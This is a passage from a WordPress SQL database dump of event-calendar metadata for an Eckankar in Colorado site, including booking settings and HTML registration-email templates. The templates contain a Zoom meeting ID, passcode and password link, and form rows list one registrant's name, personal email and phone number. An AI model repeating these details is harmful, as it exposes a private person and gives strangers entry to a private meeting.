<![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(179628,268215,'mec_event_status','EventScheduled'),(179629,268215,'mec_moved_online_link',''),(179630,268215,'mec_cancelled_reason',''),(179631,268215,'mec_display_cancellation_reason_in_single_page',''),(179632,268215,'protect_children',''),(179633,268215,'passster_activate_global_protection',NULL),(179634,268215,'passster_activate_protection',NULL),(179635,268215,'passster_protection_type','password'),(179636,268215,'boldgrid_hide_page_title','0'),(179637,268215,'_thumbnail_id','268214'),(179638,268215,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(179639,268215,'boldgrid_in_page_containers','1'),(179642,268215,'_dp_original','268213'),(179641,268215,'passster_area_shortcode',''),(179643,268215,'_edit_lock','1679111592:2'),(179644,268215,'_edit_last','2'),(179645,268216,'mec_color',''),(179646,268216,'mec_location_id','118'),(179647,268216,'mec_dont_show_map','0'),(179648,268216,'mec_organizer_id','1'),(179649,268216,'mec_read_more',''),(179650,268216,'mec_more_info',''),(179651,268216,'mec_more_info_title',''),(179652,268216,'mec_more_info_target','_self'),(179653,268216,'mec_cost',''),(179654,268216,'mec_currency','a:0:{}'),(179655,268216,'mec_additional_organizer_ids','a:0:{}'),(179656,268216,'mec_additional_location_ids','a:0:{}'),(179657,268216,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-07\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-07\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179658,268216,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179659,268216,'mec_certain_weekdays','a:0:{}'),(179660,268216,'mec_allday','0'),(179661,268216,'one_occurrence','0'),(179662,268216,'mec_hide_time','0'),(179663,268216,'mec_hide_end_time','0'),(179664,268216,'mec_comment',''),(179665,268216,'mec_timezone','global'),(179666,268216,'mec_countdown_method','global'),(179667,268216,'mec_public','1'),(179668,268216,'mec_start_date','2023-06-07'),(179669,268216,'mec_start_time_hour','7'),(179670,268216,'mec_start_time_minutes','0'),(179671,268216,'mec_start_time_ampm','PM'),(179672,268216,'mec_start_day_seconds','68400'),(179673,268216,'mec_end_date','2023-06-07'),(179674,268216,'mec_end_time_hour','8'),(179675,268216,'mec_end_time_minutes','0'),(179676,268216,'mec_end_time_ampm','PM'),(179677,268216,'mec_end_day_seconds','72000'),(179678,268216,'mec_repeat_status','0'),(179679,268216,'mec_repeat_type',''),(179680,268216,'mec_repeat_interval','1'),(179681,268216,'mec_repeat_end',''),(179682,268216,'mec_repeat_end_at_occurrences',''),(179683,268216,'mec_repeat_end_at_date',''),(179684,268216,'mec_advanced_days','a:0:{}'),(179685,268216,'mec_in_days',''),(179686,268216,'mec_not_in_days',''),(179687,268216,'mec_hourly_schedules','a:0:{}'),(179688,268216,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179689,268216,'mec_tickets','a:0:{}'),(179718,267696,'_wp_old_date','2023-01-14'),(181193,268393,'_field_33','christaylr@att.net'),(179782,268243,'mec_repeat_end',''),(179783,268243,'mec_repeat_end_at_occurrences',''),(179784,268243,'mec_repeat_end_at_date',''),(179779,268243,'mec_repeat_status','0'),(179780,268243,'mec_repeat_type',''),(179781,268243,'mec_repeat_interval','1'),(179690,268216,'mec_fees_global_inheritance','1'),(179691,268216,'mec_fees','a:0:{}'),(179692,268216,'mec_ticket_variations_global_inheritance','1'),(179693,268216,'mec_ticket_variations','a:0:{}'),(179694,268216,'mec_reg_fields_global_inheritance','1'),(179695,268216,'mec_reg_fields','a:0:{}'),(179696,268216,'mec_bfixed_fields','a:0:{}'),(179697,268216,'mec_op','a:0:{}'),(179698,268216,'mec_fields','a:0:{}'),(179699,268216,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9934:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(179700,268216,'mec_event_status','EventScheduled'),(179701,268216,'mec_moved_online_link',''),(179702,268216,'mec_cancelled_reason',''),(179703,268216,'mec_display_cancellation_reason_in_single_page',''),(179704,268216,'protect_children',''),(179705,268216,'passster_activate_global_protection',NULL),(179706,268216,'passster_activate_protection',NULL),(179707,268216,'passster_protection_type','password'),(179708,268216,'boldgrid_hide_page_title','0'),(179709,268216,'_thumbnail_id','268214'),(179710,268216,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(179711,268216,'boldgrid_in_page_containers','1'),(179712,268216,'passster_area_shortcode',''),(179714,268216,'_dp_original','268215'),(179715,268216,'_edit_lock','1687403750:2'),(179716,268216,'_edit_last','2'),(179746,268243,'mec_color',''),(179747,268243,'mec_location_id','183'),(179748,268243,'mec_dont_show_map','0'),(179749,268243,'mec_organizer_id','1'),(179750,268243,'mec_read_more',''),(179751,268243,'mec_more_info',''),(179752,268243,'mec_more_info_title',''),(179753,268243,'mec_more_info_target','_self'),(179754,268243,'mec_cost',''),(179755,268243,'mec_currency','a:0:{}'),(179756,268243,'mec_additional_organizer_ids','a:0:{}'),(179757,268243,'mec_additional_location_ids','a:0:{}'),(179758,268243,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-03\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-03\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179759,268243,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179760,268243,'mec_certain_weekdays','a:0:{}'),(179761,268243,'mec_allday','0'),(179745,268243,'protect_children',''),(181191,268393,'_field_31','Taylor'),(181192,268393,'_field_32','(704) 728-9120'),(181190,268393,'_field_30','Christopher'),(179744,268236,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37186;s:12:\"smushed-size\";i:25842;s:15:\"savings-percent\";d:30.51;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:37186;s:10:\"compressed\";i:25842;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:18420;s:10:\"compressed\";i:16282;}}}'),(179743,268236,'smush-info','The file was compressed from 36.31 KB to 25.24 KB saving 30.51 percent using WP-Optimize'),(179739,268236,'_wp_attached_file','2023/03/Easy-Way.jpg'),(179740,268236,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:20:\"2023/03/Easy-Way.jpg\";s:8:\"filesize\";i:37186;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Easy-Way-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1455574161\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179741,268236,'original-file','2023/03/Easy-Way-updraft-pre-smush-original.jpg'),(179742,268236,'smush-complete','1'),(179836,268244,'mec_comment',''),(179837,268244,'mec_timezone','global'),(179838,268244,'mec_countdown_method','global'),(179839,268244,'mec_public','1'),(179840,268244,'mec_start_date','2023-04-01'),(179841,268244,'mec_start_time_hour','1'),(179842,268244,'mec_start_time_minutes','0'),(179843,268244,'mec_start_time_ampm','PM'),(179844,268244,'mec_start_day_seconds','46800'),(179845,268244,'mec_end_date','2023-04-01'),(179846,268244,'mec_end_time_hour','2'),(179847,268244,'mec_end_time_minutes','0'),(179848,268244,'mec_end_time_ampm','PM'),(179849,268244,'mec_end_day_seconds','50400'),(179850,268244,'mec_repeat_status','0'),(179851,268244,